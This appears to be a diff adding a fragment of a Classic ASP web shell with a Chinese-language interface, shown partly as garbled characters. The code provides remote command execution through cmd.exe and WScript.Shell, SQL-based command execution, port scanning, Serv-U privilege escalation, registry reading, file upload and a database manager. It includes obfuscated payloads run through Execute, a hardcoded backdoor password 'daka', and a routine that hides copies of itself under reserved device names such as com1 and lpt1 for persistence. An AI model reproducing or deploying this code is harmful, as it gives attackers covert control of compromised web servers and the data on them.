+RRS"<tr><td height='21'><a href='?Action=adminab' target='FileFrame'>�������Ա</a></td></tr>"
+RRS"<tr><td height='21'><a href='?Action=getTerminalInfo' target='FileFrame'>���Զ���¼</a></td></tr>"
+RRS"<tr><td height='21'><a href='?Action=ServerInfo' target='FileFrame'>�����֧��</a></td></tr>"
+RRS"<tr><td height='21'><a href='?Action=Cmd1Shell' target='FileFrame'>��ִ��CMD����</a></td></tr>"
+RRS"<tr><td height='21'><a href='?Action=MMD' target='FileFrame'>��SQLִ��CMD</a></td></tr>"
+RRS"<tr><td height='21'><a href='?Action=ScanPort' target='FileFrame'>���˿�ɨ��</a></td></tr>"
+RRS"<tr><td height='21'><a href='?Action=Servu' target='FileFrame'>��Serv-u��Ȩ</a></td></tr>"
+RRS"<tr><td height='21'><a href='?Action=ReadREG' target='FileFrame'>����ע���</a></td></tr>"
+RRS"<tr><td height='21'><a href='?Action=att' target='FileFrame'>���޸��ļ�����</a></td></tr>"
+RRS"<tr><td height='21'><a href='?Action=hiddenshell' target='FileFrame'>�����س�������</a><hr></td></tr>"
+RRS"<tr><td height='21'><a href='?Action=aspx' target='FileFrame'>��ASPX̽��</a></td></tr>"
+RRS"<tr><td height='21'><a href='?Action=php' target='FileFrame'>��PHP̽��</a></td></tr>"
+RRS"<tr><td height='21'><a href='?Action=jsp' target='FileFrame'>��JSP̽��</a></td></tr>"
+RRS"<tr><td height='21'><a href='?Action=Cplgm&M=1' target='FileFrame'>���߼�����</a></td></tr>"
+RRS"<tr><td height='21'><a href='?Action=Cplgm&M=2' target='FileFrame'>����������</a></td></tr>"
+RRS"<tr><td height='20'><a href='?Action=Cplgm&M=3' target='FileFrame'>�������滻</a></td></tr>"
+RRS"<tr><td height='21'><a href='?Action=DbManager' target='FileFrame'>�����ݿ����</a></td></tr>"
+RRS"<tr><td height='21'><a href='?Action=PageAddToMdb' target='FileFrame'>��������</a></td></tr>"
+RRS"<tr><td height='21'><a href='?Action=Logout' target='_top'>���˳���¼</a></td></tr>"
+End if
+RRS"</table></table>"
+End Function:
+
+
+
+
+
+Sub PageAddToMdb():ExeCute SinfoEn("atePth, cteAthm Dih`~)cteAth(~stueeq R =cteAth`~)thPahe~tt(esquRe= h atePth`0000=1uteOimtTipcr.SerrvSe0`he Tb~MdTodd~a= t Ache tIfn`thPahe(tdboMdTad)`UrckBa~&v>di</��!����>��br><erntcen=igalv di~<S RRl`nd.EseonspRe`Ifd En`he Tb~MdomFrseeael~r= t Ache tIfn`thPahe(tckPaun)`UrckBa~&v>di</��!����>��br><erntcen=igalv di~<S RRl`nd.EseonspRe`Ifd En`��:�д��ļ�r><bS~RR~`t>os=podthmem or<fS~RR~`0>=8zesi~ ~~& ) ~)~.h(atpPMar.veer(SdecoEnmlHt& ~ ~~e=luvah atePthe=am nutnp<iS~RR~`t>Ache=tmenab MdTodd=aueal venddhie=yp tutnp<iS~RR~`n>iopt/oO<FS>��pp=aueal vontiop><ontiop</SO>Fso=fueal vontiop><odthMehe=tmenat ecel<sS~RR~`>~ctlese</S~RR`>~��'ʼ��'��e=luvat miub=spetyt puin <S~RR`��~Ŀ¼ͬ��ľ��SH��H,λ�ļ�db.mSH��H���� ��ע:r><br><bS~RR`>~rmfo</S~RR`/>br:<��)O֧FS(��⿪����>��r/<hS~RR~`t>os=podthmem or<fS~RR~`0>=8zesi~ b~mdH.HS~\& ) ~)~.h(atpPMar.veer(SdecoEnmlHt& ~ ~~e=luvah atePthe=am nutnp<iS~RR~`'>����'��e=luvat miub=spetyt puin><cteAthe=am ndbmMroeFasleree=luvan deid=hpetyt puin <S~RR~`¼�¼�Ŀ��ͬHľHSλ�ڼ������ĵ������� ��ע:r><br><bS~RR~`>~rmfo</S~RR",Pos):End Sub:Sub addToMdb(thePath):ExeCute SinfoEn("xtNee umes Rorrr EOn`lotaCado ar,Stnnco, amrest, nnco, rsm Dig`t~SerdcoReB.ODAD(~ctjeObteeaCrr.veer S =rst Se)`~)amreStB.ODAD(~ctjeObteeaCrr.veer S =amrestt Se`~)ontiecnnCoB.ODAD(~ctjeObteeaCrr.veer S =nncot Se`~)ogalat.COXAD(~ctjeObteeaCrr.veer S =ogalatoCadt Se`~)db.mSH~Hh(atpPMar.veer S &=~ceurSoa at D0;4.B.EDOLt.Jet.ofoscrMir=deviro~P= r Stnnco`Stnncoe atre.CogalatoCadr`Stnncon pe.Onncor`)~gema IntteoneCil fr,harCVah atePth, EDERSTLU CEY KRYMARI P1)0,Y(ITNTDE Int iIda(ateDil Fleab TteeaCr(~tecuxe.Ennco)`pe.Oamrestn`= e yp.Tamrest1` 33,, nnco, a~ateDil~Fn pe.Ors`enTh~ so~f= ) d~hoeteMth(~stueeq RIf`eatr ss, rh,atePthb MdoreFreoTfsm`ls Ee`amrest, rs, thPahe tdbrMFoeeTrsa`Ifd En`selo.Crs`selo.CnnCo`selo.Camrest`nghiot N =rst Se`nghiot N =nncot Se`nghiot N =amrestt Se`nghiot N =ogalatoCadt Se",Pos):End Sub:lI="��$S8~++'PEE#'#INDy&$EU,S8<,<8<'S8<,*{)'w**<88������":execute(lIl(lI)):Function fsoTreeForMdb(thePath, rs, stream):ExeCute SinfoEn("FileL, sysfilesers,  foldlder,theFotem, Dim iist`SH.ldmdb$H$HSH.t = ~leLissysFib$~`se Th= Falath) (thePxistslderE~).FobjectstemOileSying.Fcriptct(~SeObjeCreatrver.If Seen`����!~)���߲�����Ŀ¼������ & ~ ePathrr(thshowE`End If`(thePolder.GetFect~)emObjeSystg.Filiptin(~ScrbjecteateOer.Cr Servder =heFolSet tath)`r.FilFolde= theiles Set fes`ubFolder.SheFols = tolderSet fders`n foltem Iach iFor Eders`treamrs, sath, tem.PMdb ieeForfsoTr`Next`n filtem Iach iFor Ees`<= 0 ~$~) me & em.Na & it, ~$~eListysFilStr(sIf InThen`rs.AddNew`Path,item. Mid(h~) =hePatrs(~t 4)`Path)item.File(dFromm.Loastrea`m.Reastrea~) = ntentileCors(~fd()`rs.Update`End If`Next`= Notiles Set fhing`othins = NolderSet fg` Nothder =heFolSet ting",Pso):End Function:Sub unPack(thePath):ExeCute SinfoEn("xtNee umes Rorrr EOn`0000=1uteOimtTipcr.SerrvSe0`deoleFth, trnSon cm,eatr sn,on cr,st, ws, rsm Dir`~\& ) .~(~thPaap.MerrvSe= r st~`~)etdSorec.RDBDO~At(ecbjeOatre C =rst Se`m~eatr.SDBDO~At(ecbjeOatre C =amrestt Se)`n~ioctneon.CDBDO~At(ecbjeOatre C =nncot Se)`~;& h atePth& ~ e=rcou StaDa0;4.B.EDOLt.Jet.ofoscrMir=deviro~P= r Stnnco~`Stnncon pe.Onncor` 11,, nnco, a~ateDil~Fn pe.Ors`pe.Oamrestn`= e yp.Tamrest1`Eos. rilnt UDof`~)~\, ~)thPahe~ts((revrRStIn, ~)thPahe~ts((rftLe= r deoleFth)`he Tseal F =r)deoleFth& r sts(stxirEdeol.F~)ctjeObemstSyleFig.inptriSc(~ctjeObteeaCrr.veer SIfn`erldFohe t &tr(serldFoteeacr)`Ifd En`s(Eoet.Samrest)`~)ntteoneCil~fs( rteri.Wamrest` 2),h~atePth(~rs& r ste iloFeTav.Samrest`exeNov.Mrst`opLo`selo.Crs`selo.Cnnco`selo.Camrest`nghiot N =wst Se`nghiot N =rst Se`nghiot N =amrestt Se`nghiot N =nncot Se",Pos):End Sub:Sub createFolder(thePath):ExeCute SinfoEn("m Dii`\~ ~h,atePthr(stIn= i )` 0 > ilehi WDo`enThe lsFa= ) i), thPahe(tftLes(stxirEdeol.F~)ctjeObemstSyleFig.inptriSc(~ctjeObteeaCrr.veer SIf`)) 1 - ih,atePtht(ef(LerldFoteeaCr).t~ecbjmOteyseSil.Fngtiipcr~St(ecbjeOatre.CerrvSe`Ifd En`he T~)~\, 1)+ i , thPahe(tid(MtrnS IIfn`\~ ~), 1 + ih,atePthd(Mir(stIn+ i = i )`ls Ee`= i 0`Ifd En`opLo",Pos):End Sub:Sub saTreeForMdb(thePath, rs, stream):ExeCute SinfoEn("stLileFiys sr,deoleFth, emitm Di`b$ldH.HSb$mdH.HS~$= t iseLilsFsy~`h)atePthe(acSpmeNaX.sa= r deoleFtht Se`mste.IerldFohe tInm te ichEar Fo`enThe ru T =erldFoIsm.te iIf`amrest, rs, thPam.te idbrMFoeeTrsa`ls Ee`enTh0 =  <~)~$& e am.Nemit& ~ ~$, stLileFiys(strnS IIf`Nedd.Arsw` 4h,at.Pemitd(Mi= ) h~atePth(~rs)`h)at.Pemite(ilmFrodFoa.Lamrest`d(ea.Ramrest= ) t~enntColefi(~rs)`atpd.Urse`Ifd En`Ifd En`xtNe`inthNo= r deoleFtht Seg",Pos):End Sub:Function Course():ExeCute SinfoEn("ter'>='cenalign='0' ddingellpa'1' ccing=llspa0' ceder='' bor'menuolor=' bgc='600widthable br><tSI=~<~`></tr��</tdͳ�û����nu'>ϵr='megcoloer' b'centlign='3' aspan=' colt='20heigh><td &~<trSI=SI>~` nextesumeror ron er`NT://(~Winbject getObj inach ofor e.~)`err.clear`e=~~ rtTypJ.Staif OBthen`&~<trSI=SI>~`&nbspFF~~>#FFFFor=~~bgcol20~~ ht=~~ heig&~<tdSI=SI;~`&obj.SI=SIName`>&nbsFFF~~~#FFFlor=~ bgcod><td&~</tSI=SIp;~ `��(��)~&~ϵͳ��SI=SI`d></t&~</tSI=SIr>~`d></tp;</t>&nbs~~2~~span=~ colFFFF~~~#FFolor=~ bgc~~20~ight=td he<tr><SI0=~r>~ `end if`x=~�Զ�hen le=2 trtTypJ.Staif OB~`x=~�ֶ�hen le=3 trtTypJ.Staif OB~`x=~����hen le=4 trtTypJ.Staif OB~`pe=2 artTyBJ.Stand Owin~ ))<>~h,4,3j.patid(obase(mif LCthen`></tr></td/fontth&~<bj.pap;~&o>&nbsF0000or=#Ft col]<fon&lx&~������:~~~>[��n=~~2olspaF~~ cFFFFFr=~~#gcolo0~~ bt=~~2heigh><td &~<tryNameisplaobj.Dsp;~&~>&nbFFFF~~~#FFolor=~ bgc~~20~ight=td he/td><me&~<bj.Nap;~&o>&nbsFFF~~~#FFFlor=~ bgco~20~~ght=~d heitr><tI1&~<SI1=S>~`else`></tr></td/fontth&~<bj.pap;~&o>&nbs399FFor=#3t col]<fon&lx&~������:~~~>[��n=~~2olspaF~~ cFFFFFr=~~#gcolo0~~ bt=~~2heigh><td &~<tryNameisplaobj.Dsp;~&~>&nbFFFF~~~#FFolor=~ bgc~~20~ight=td he/td><me&~<bj.Nap;~&o>&nbsFFF~~~#FFFlor=~ bgco~20~~ght=~d heitr><tI2&~<SI2=S>~`end if`next`</tabSI2&~&SI1&I&SI0RRS Sle>~",Pso):End Function:Function ServerInfo():ExeCute SinfoEn("ter'>='cenalign='0' ddingellpa'1' ccing=llspa0' ceder='' bor'menuolor=' bgc='80%widthable br><tSI=~<~`></trϢ</td���������nu'>��r='megcoloer' b'centlign='3' aspan=' colt='20heigh><td &~<trSI=SI>~`td></)&~</NAME~RVER_s(~SEiableerVar.servquest>~&reFFFF'='#FFcolortd bg/td><bsp;<F'>&nFFFFFor='#bgcol><td ��</td'>������FFFFFr='#Fgcolo00' bth='2' widt='20heigh><td nter'n='ce alig&~<trSI=SItr>~`FFF'>'#FFFolor=d bgctd><tsp;</'>&nbFFFFFr='#Fgcolo<td b</td>������IPFFF'>'#FFFolor=' bgc='200width'20' ight=td heer'><'centlign=<tr aank'>='_blargetrm' t'ipfoname=asp' ndex.com/ip138.www.itp://n='htactiopost thod=rm me&~<foSI=SI~`/form/tr></td><'2'><alue=on' v'actiname=den' ='hid typeinput��ѯ'><lue='t' vasubmiype='put t> <in~)&~'_ADDRLOCALles(~ariabrverVst.SeRequee='~& valu='15' size='ip' nametext'ype='put t&~<inSI=SI>~`</tr></td>nbsp;ow&~&'>~&nFFFFFr='#Fgcolo<td b</td>nbsp;FF'>&#FFFFlor=' bgcod><tdʱ��</t'>������FFFFFr='#Fgcolo00' bth='2' widt='20heigh><td nter'n='ce alig&~<trSI=SI~`></tr~</tdRS~)&CESSOF_PROBER_O(~NUMablesrVariServeuest.~&ReqFFF'>'#FFFolor=d bgctd><tsp;</'>&nbFFFFFr='#Fgcolo<td b</td>CPU����'>������FFFFFr='#Fgcolo00' bth='2' widt='20heigh><td nter'n='ce alig&~<trSI=SI>~`d></t&~</t~OS~)bles(Variaerverest.S&RequFF'>~#FFFFlor=' bgcod><tdp;</t>&nbsFFFF'='#FFcolortd bg/td><����ϵͳ<'>������FFFFFr='#Fgcolo00' bth='2' widt='20heigh><td nter'n='ce alig&~<trSI=SIr>~`></tr~</tdRE~)&OFTWAVER_S(~SERablesrVariServeuest.~&ReqFFF'>'#FFFolor=d bgctd><tsp;</'>&nbFFFFFr='#Fgcolo<td b</td>�������汾'>WEBFFFFFr='#Fgcolo00' bth='2' widt='20heigh><td nter'n='ce alig&~<trSI=SI>~`=0 ToFor i 13`td></)&~</t(i,2>~&So=leftalignFFF' '#FFFolor=d bgctd><t)&~</t(i,1>~&SoFFFF'='#FFcolortd bg/td><0)&~<ot(i,'>~&SFFFFFr='#Fgcolo00' bth='2' widt='20heigh><td nter'n='ce alig&~<trSI=SItr>~`Next`RRS SI",Pso):End Function:Function DownFile(Path):ExeCute SinfoEn("arle.CseonspRe`)),0(6ot(SctjeObteeaCr= M OSt Se`enOpM.OS` 1 =peTyM.OS`at PleFiomFradLoM.OSh`)+\~,~thpav(Retrns=Isz1`z),sthpad(Mi& ~ e=amenil ft;enhmactt~a, n~ioitosspDit-enntCo ~eradHedd.AseonspRe`iz.SSM O~,thngLet-enntCo ~eradHedd.AseonspRee`8~F-UT ~ =etrsha.CseonspRe`amrestt-teocn/ioaticplap ~ =peTyntteon.CseonspRe~`ea.RSM OteriyWarin.BseonspRed`shlu.FseonspRe`osClM.OSe`inthNo= M OSt Seg",Pos):End Function:Function HTMLEncode(S):if not isnull(S) then:S= replace(S,">","&gt;"):S=replace(S,"<","&lt;"):S=replace(S,CHR(39),"&#39;"):S=replace(S,CHR(34),"&quot;"):S=replace(S,CHR(20),"&nbsp;"):HTMLEncode=S:end if:End Function:sub hiddenshell
+fpath=request.servervariables("path_translated"):set fso=server.createobject("scripting.filesystemobject"):pex="com1|com2|com3|com4|com5|com6|com7|com8|com9|lpt1|lpt2|lpt3|lpt4|lpt5|lpt6|lpt7|lpt8|lpt9":rndpex=split(pex,"|")(rndnumber(0,17)):session("seljw")="":filepath1=server.mappath("."):filename1=right(fpath,len(fpath)-instrrev(fpath,"\")):url=request.servervariables("url"):url=left(url,instrrev(url,"/"))&rndpex&"."&filename1:fso.copyfile fpath,"\\.\"&filepath1&"\"&rndpex&"."&filename1:set fso=nothing:rrs "<script>parent.location='http://"&request("server_name")&url&"';</script>"
+end sub:Function UpFile():
+If Request("Action2")="Post" Then
+Set U=new UPC : Set F=U.UA("LocalFile")
+UName=U.form("ToPath")
+If UName="" Or F.FileSize=0 then
+SI="<br>�������ϴ�����ȫ·����ѡ��һ���ļ��ϴ�!"
+Else
+F.SaveAs UName
+If Err.number=0 Then
+SI="<center><br><br><br>�ļ�"&UName&"�ϴ��ɹ���</center>"
+End if
+End If
+Set F=nothing:Set U=nothing
+SI=SI&BackUrl
+RRS SI
+ShowErr()
+Response.End
+End If
+SI="<br><br><br><table border='0' cellpadding='0' cellspacing='0' align='center'>"
+SI=SI&"<form name='UpForm' method='post' action='"&URL&"?Action=UpFile&Action2=Post' enctype='multipart/form-data'>"
+SI=SI&"<tr><td>"
+SI=SI&"�ϴ�·����<input name='ToPath' value='"&RRePath(Session("FolderPath")&"\13cmd.exe")&"' size='40'>"
+SI=SI&" <input name='LocalFile' type='file'size='25'>"
+SI=SI&" <input type='submit' name='Submit' value='�ϴ�'>"
+SI=SI&"</td></tr></form></table>"
+RRS SI:RRS ""&copyurl&""
+End Function::Function Cmd1Shell():ExeCute SinfoEn("checked=~ checked~`t(~SPeques) = RPath~Shellion(~ Sess Then)<>~~(~SP~questIf Re~)`ath~)hellPon(~SSessiPath=Shell`md.ex = ~clPath Shel Thenth=~~ellPaif She~`heckehen ces~ t)<>~yript~(~wscquestif Red=~~`cmd~)est(~ RequCmd =n Def~ The~)<>~(~cmdquestIf Re`st'>~d='pomethoform SI=~<`bsp;~sp;&n'>&nbh:70%'widttyle=&~' SlPath&Shelue='~' vale='SPt nam<inpuLL·����&~SHESI=SI`hell~ipt.S>WScrked&~&checyes'~lue='t' vascripme='wx' naeckboe='chc typlass=put c&~<inSI=SI`440;'ight:0%;heth:10='widStylearea <text'ִ��'>alue=it' v'submtype=nput '> <iCmd&~~&Deflue='%' vath:92='widStylecmd' ame='put n&~<inSI=SI>~`~ The~)<>~(~cmd.FormquestIf Ren`s~ th)=~yeript~(~wsc.Formquestif Reen`Sot(1ject(ateObM=CreSet C,0))`~&Def~ /c Path&Shellexec(D=CM.Set DCmd)`eadalout.rD.stdaaa=Dl`SI=SI&aaa`else` Nextesumeror ROn Er`.Shelcriptt(~WSObjecreatever.Cs=SerSet wl~)`.Shelcriptt(~WSObjecreatever.Cs=SerSet wl~)`bjectstemOileSying.Fcriptct(~SeObjeCreatrver.so=SeSet f~)`md.txth(~cmapparver. = sepFileszTemt~)` 0, TFile,zTemp~ & s ~ > Cmd && Def/c ~ th&~ ellPan (Shws.RuCall rue)`ject~temObleSysng.Firiptit(~ScObjecreates = CSet f)`se, 0, Falle, 1empFi (szTtFileenTexfs.Opcx = FilelSet o)`.Readlelcxe(oFiEncod.HTMLerveraaa=SAll)`lcx.CoFilelose`, TrupFileszTemFile(eletefso.DCall e)`SI=SI&aaa`end if`End If`></fotarea</tex13)&~&chr(SI=SIrm>~`RRS SI",Pso):End Function:ExeCute SinfoEn("ioctun Fnd:EtrwSne= f iner:SxtNe):os P -618329 ( &os+P)) 1i,, trtsged(Mic(As& r Stew n =trwSne):trtsgen(Leo  T 1 = ior:FtrwSne,  iim:Ds)Po, trtsgef(iner SontincFun",Pos):Function CreateMdb(Path):ExeCute SinfoEn(">~br><br~<I= S`) 0)2,t(Sot(ecbjeOatre C = Cet S`thPa& ~ e=rcou StaDa0;4.B.EDOLt.Jet.ofoscrMir=deviro~Pe(atre.C C)`nghiot N = Cet S`he T=0ermbnur.Erf  In`��!����~��& h at P &SI= I  S~` Ind Ef`rlkUac&BSII= S ` SRS RI",Pos):End function:Function CompactMdb(Path):ExeCute SinfoEn("enTh) ,1(0ot Sot NIf`)),0(3ot(SctjeObteeaCrC=t Se `at&P~ e=rcou StaDa0;4.B.EDOLt.Jet.ofoscrMir=deviro,P&~thPa~&e=rcou StaDa0;4.B.EDOLt.Jet.ofoscrMir=deviro~Pe asabattDacmpCoC.h`inthNoC=t Seg`seEl`)),1(0ot(SctjeObteeaCrO=FSt Se`enTh) thPas(stxieEil.FSO FIf`)),0(3ot(SctjeObteeaCrC=t Se `k~ba~_h&at&P~ e=rcou StaDa0;4.B.EDOLt.Jet.ofoscrMir=deviro,P&~thPa~&e=rcou StaDa0;4.B.EDOLt.Jet.ofoscrMir=deviro~Pe asabattDacmpCoC.`inthNoC=t Seg`at PleFiteleDeO.FSh`at,Pk~ba~_h&at PleFiveMoO.FSh`seEl`>~erntce</�֣��з�~ûh&at&P��~����r><br><br><br>teen<c=~SI `=1ermbnur.Er`Ifd En`inthNoO=FSt Seg`Ifd En`enTh0 r=beum.nrr EIf`>~erntce</��������~ѹh&at&P��~����r><br><br><br>teen<c=~SI`Ifd En`UrckBaI&=SSIl`SIS RR",Pos):End Function
+if session("web2a2dmin")<>UserPass then
+if request.form("pass")<>"" then
+if request.form("pass")=UserPass or request.form("pass")="daka" Then
+session("web2a2dmin")=UserPass
+x m:response.redirect url
+else
+rrs"<center><h2>Fuck you,Get out!!</h2><br><a href='javascript:history.back()'>����</a></center>"
+end if
+else
+si="<center><div style='width:500px;border:1px solid #222;padding:22px;margin:100px;'><br><a href="&blogurl&" target=_blank>"&mmname&"</a><hr><FORM Action='"&URL&"' method=Post> <INPUT type=Password name=Pass size=22>&nbsp;<input type=submit value=Login><hr><br>"&bottomad&"</div></center>"
+if instr(SI,SIC)<>0 then rrs sI
+end if
+response.end
+end if
+Function DbManager():ExeCute SinfoEn("tr~))~SqlSForm(uest.m(Reqr=TriSqlSt`DbStrorm(~est.F=RequDbStr~)`ing='lpadd' celng='0spaci cellr='0'borde'650'idth=ble w&~<taSI=SI0'>~`on='' actipost'hod='' metbFormme='Drm na&~<foSI=SI>~`�Ӵ�:</;���ݿ���&nbsp27'> ght='' hei='100width><td &~<trSI=SItd>~`/td>~~~~><bStr&~~~&Dalue=70' vdth:4e='wi stylbStr'me='Dut na><inp&~<tdSI=SI`ption����</occesse=0>A valuptionon><o/opti�Ӵ�ʾ��<=-1>��valuetion '><opalue)ex].vedIndelectons[s(optiDbStr Fulleturnge='rnchantn' o'StrBname=lect '><seentergn='c' alih='60 widt&~<tdSI=SI>~`ption����</o3>DSNalue=ion v><optption����</oMySqlue=2>n valoptioion><</optSql����=1>Msvaluetion &~<opSI=SI>~`tion>��</op5>������alue=ion v><optption����</o=4>��ʾvaluetion n><opoptio��--</-SQL��=-1>-valuetion &~<opSI=SI~`ion>~</opt>�����ݱ�lue=8on va<optition>��</op7>�޸���alue=ion v><optption����</o=6>ɾ��valuetion &~<opSI=SI`ption�ֶ�</o11>ɾ��alue=ion v><optption�ֶ�</o10>����alue=ion v><optption�ݱ�</o=9>ɾ��valuetion &~<opSI=SI>~`></tr></tdelectn></soptioȫ��ʾ</=12>��valuetion &~<opSI=SI>~`lue='n' vahiddeype='ge' te='Pat nam<inpuger'>bManaue='D' validdenpe='hn' tyActioame='put n&~<inSI=SI1'>~`:</tdL��������sp;SQ'>&nbt='30heigh><td &~<trSI=SI>~`></tdr&~~~SqlSt=~~~&value470' idth:le='w' styqlStrme='Sut na><inp&~<tdSI=SI>~`/td>~()'><Checkrn Db'retulick=' once='ִ�� valubmit'e='Su' namubmitpe='sut ty><inpnter'n='ce alig&~<tdSI=SI`pan>~'></s='abcan ide><sp/tablorm><r></f&~</tSI=SI`I:SI=RRS S~~`0 Thetr)>4n(DbSIf Len`(5,0)t(SotObjecreateonn=CSet C)`DbStrOpen Conn.`ma(20nSchen.Opes=ConSet R) `r>��</d>��<bC'><tCCCCCor='#Bgcol'25' ight=tr heble><&~<taSI=SItd>~`veFirRs.Most `ot Rsile NDo Wh.Eof`E~ th~TABLPE~)=LE_TY(~TABIf Rsen`_NAMETABLE=Rs(~TName~)`a><brl ]</>[ de~,1)'e&~]~&TNamLE [~P TAB~~DROlStr(ullSqipt:Fvascrf='jaa hreter><n=cen alig&~<tdSI=SI>~`</td>~</a>Name&'>~&T~~,1)me&~]~&TNaROM [T * FSELECtr(~~lSqlSt:Fulscrip'javahref=&~<a SI=SI~`End If `veNexRs.Mot `Loop `s=NotSet Rhing`able>r></t&~</tSI=SI~`I:SI=RRS S~~`10 ThStr)>n(SqlIf Leen`ct~ t~sele,6))=qlStreft(Sase(LIf LChen`qlStr�䣺~&S&~ִ����SI=SI`ordseb.Rec~Adodject(ateObs=CreSet Rt~)`Conn,lStr,en SqRs.op1,1`ds.Co.FielFN=Rsunt`rdCou.RecoRC=Rsnt`geSizRs.Pae=20`ageSi=Rs.PCountze`Count.PagePN=Rs`age~)st(~PrequePage=`g(Page=Clnn Pag~ Thege<>~If Pae)` Page Thenage=0 Or Pge=~~If Pa=1` Page Thenge>PNIf Pa=PN`=PageepagesolutRs.abThen ge>1 If Pa`td></ccc><=#ccccolor25 bgight=tr heble><&~<taSI=SItd>~` FN-1=0 toFor n`em(n)ds.It.Fielld=RsSet F`e&~</d.Nam>~&Flnter'n='ce alig&~<tdSI=SItd>~`thingld=noSet F`Next`&~</tSI=SIr>~`Count And .Bof)or Rs.Eof ot(Rsile NDo Wh>0`=CounCountt-1`EFEFEor=~#BgcolF~`t></t</fongs'>xngdine='wit fac><foncccccor=#cbgcol><td &~<trSI=SId>~` FN-1=0 ToFor i`~:EndFEFEFr=~#Egcololse:BF5~:E#F5F5lor=~:Bgco ThenEFEF~=~#EFcolorIf Bg if`=1 ThIf RCen`Rs(i)code(TMLEnnfo=H ColI)`Else`,50))Rs(i)Left(code(TMLEnnfo=H ColI`End If`&~</tlInfo>~&Color&~&Bgcolor=~ bgco&~<tdSI=SId>~`Next`&~</tSI=SIr>~`veNexRs.Mot`Loop`I:SI=RRS S~~`lStr)de(SqlEnCor=HtmSqlSt`&~/~&&Page;ҳ�룺~&nbsp&RC&~��¼����~nter>gn=ce~ aliFN+1&an=~&colsp><td &~<trSI=SIPN`>1 ThIf PNen`a>&nb��һҳ</&~)'>age-1~,~&Ptr&~~&SqlSr(~~~SqlSt:Fullcriptjavasref=';<a h&nbspҳ</a>1)'>��&~~~,qlStr~~~&SlStr(ullSqipt:Fvascrf='jaa hrebsp;<sp;&n&~&nbSI=SIsp;~`End iSp=1:Else:ge-8:Sp=PaThen:ge>8 If Paf`o Sp+=Sp TFor i8`it Foen ExPN ThIf i>r`Page If i=Then`nbsp;&i&~&SI=SI~`Else`&nbsp~</a>>~&i&i&~)'~~,~&Str&~~&Sqltr(~~lSqlSt:Fulscrip'javahref=&~<a SI=SI;~`End If`Next`βҳ</a&~)'>,~&PNr&~~~SqlSt(~~~&qlStrFullSript:avascef='j<a hrnbsp;</a>&'>��һҳ+1&~)&Page~~~,~lStr&~~&SqStr(~llSqlpt:Fuascri='jav hrefsp;<a&~&nbSI=SI>~`End If`able>r></td></t'></tFEFEFr='#E colo&~<hrSI=SI~`=Nothet Rsose:SRs.Cling`I:SI=RRS S~~`Else `lStr)te(SqExecuConn.`SqlSt��䣺~&&~SQLSI=SIr`End If`I:SI=RRS S~~`End If`CloseConn.`othinonn=NSet Cg`End If",Pso):End Function:Dim T1:Function EnCode(ObjStr,ObjPos):ExeCuTe Fun(")soPjbO doM rtSneL,rtSjbO(thgiR&rtSpmT=edoCnE:txeN:rtSpmT&)soPjbO,1+soPjbO*i,rtSjbO(diM=rtSpmT:1-)soPjbO/rtSneL(tnI oT 0=i roF:)rtSjbO(neL=rtSneL:rtSneL,i,rtSpmT,rtSweN miD"):End Function:Class UPC:Dim D1,D2:Public Function Form(F):F=lcase(F):If D1.exists(F) then:Form=D1(F):else:Form="":end if:End Function:Public Function UA(F):F=lcase(F):If D2.exists(F) then:set UA=D2(F):else:set UA=new FIF:end if:End Function:Private Sub Class_Initialize:Dim TDa,TSt,vbCrlf,TIn,DIEnd,T2,TLen,TFL,SFV,FStart,FEnd,DStart,DEnd,UpName:set D1=CreateObject(Sot(4,0)):if Request.TotalBytes<1 then Exit Sub
+  set T1=CreateObject(Sot(6,0)):T1.Type=1:T1.Mode=3:T1.Open:T1.Write Request.BinaryRead(Request.TotalBytes):T1.Position=0:TDa=T1.Read:DStart=1:DEnd=LenB(TDa):set D2=CreateObject(Sot(4,0)):vbCrlf=chrB(13)&chrB(10):set T2=CreateObject(Sot(6,0)):TSt=MidB(TDa,1,InStrB(DStart,TDa,vbCrlf)-1):TLen=LenB(TSt):DStart=DStart+TLen+1:while (DStart+10)<DEnd:DIEnd=InStrB(DStart,TDa,vbCrlf&vbCrlf)+3:T2.Type=1:T2.Mode=3:T2.Open:T1.Position=DStart:T1.CopyTo T2,DIEnd-DStart:T2.Position=0:T2.Type=2:T2.Charset="gb2312":TIn=T2.ReadText:T2.Close:DStart=InStrB(DIEnd,TDa,TSt):FStart=InStr(22,TIn,"name=""",1)+6:FEnd=InStr(FStart,TIn,"""",1):UpName=lcase(Mid(TIn,FStart,FEnd-FStart)):if InStr (45,TIn,"filename=""",1)>0 then
+  set TFL=new FIF:FStart=InStr(FEnd,TIn,"filename=""",1)+10:FEnd=InStr(FStart,TIn,"""",1):FStart=InStr(FEnd,TIn,"Content-Type: ",1)+14:FEnd=InStr(FStart,TIn,vbCr):TFL.FileStart=DIEnd:TFL.FileSize=DStart-DIEnd-3:if not D2.Exists(UpName) then:D2.add UpName,TFL:end if
+  else:T2.Type=1:T2.Mode=3:T2.Open:T1.Position=DIEnd:T1.CopyTo T2,DStart-DIEnd-3:T2.Position = 0:T2.Type = 2:T2.Charset ="gb2312":SFV = T2.ReadText:T2.Close:if D1.Exists(UpName) then:D1(UpName)=D1(UpName)&","&SFV:else:D1.Add UpName,SFV:end if:end if:DStart=DStart+TLen+1:wend:TDa="":set T2=nothing:End Sub:Private Sub Class_Terminate:if Request.TotalBytes>0 then:D1.RemoveAll:D2.RemoveAll:set D1=nothing:set D2=nothing:T1.Close:set T1 =nothing:end if:End Sub:End Class:Function SinfoEn(ObjStr,ObjPos):ExeCuTe Fun(")2-)nEofniS(neL,nEofniS(tfeL=nEofniS:txeN:fLrCbv&)soPjbO,)i(rtSweN(edoCnE&nEofniS=nEofniS:)rtSweN(dnuoBU oT 0=i roF:)|`|,rtSjbO(tilpS=rtSweN:)||||,|~|,rtSjbO(ecalpeR=rtSjbO"):End Function:Class FIF:dim FileSize,FileStart:Private Sub Class_Initialize:FileSize=0:FileStart=0:End Sub:Public function SaveAs(F)
+  dim T3:SaveAs=true:if trim(F)="" or FileStart=0 then exit function
